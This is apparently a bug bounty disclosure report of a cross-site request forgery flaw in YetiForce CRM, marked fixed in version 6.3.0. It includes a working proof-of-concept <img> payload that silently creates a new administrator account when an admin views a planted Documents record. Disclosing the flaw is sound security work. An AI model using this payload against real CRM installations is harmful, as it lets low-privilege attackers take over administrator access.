Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm


Reported on

Jan 12th 2022


Hi there, I would like to report a CSRF vulnerability in yetiforcecompany/yetiforcecrm. This allows an attacker to create a new admin. Even when SameSite: Strict enable, this still can be exploited by an attacker with lowest privilege account (E.g. guest).

Proof of Concept

  • These are POCs for 2 scenario, both leads to create a new admin with username testggwp and password Admin@123.

  • Scenario 1: SameSite is None or Lax

  • Trick admin to access below link

  • Scenario 2: Samesiteis Strict

  • Create a record in Documents with below payload in description (click source then paste). After that, trick Admin to visit the record.

<img src="/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&"> 


After csrf payload is triggered, attacker can become an admin with full privilege.

We are processing your report and will contact the yetiforcecompany/yetiforcecrm team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a exists 2 years ago
We have contacted a member of the yetiforcecompany/yetiforcecrm team and are waiting to hear back 2 years ago
We have sent a follow up to the yetiforcecompany/yetiforcecrm team. We will try again in 7 days. 2 years ago
2 years ago


Thank you for the report, We're currently working on a fix that will be released soon and then we'll take care of this report. Thanks.

Radosław Skrzypczak validated this vulnerability 2 years ago
supernaruto16 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Radosław Skrzypczak marked this as fixed in 6.3.0 with commit 298c78 2 years ago
Radosław Skrzypczak has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation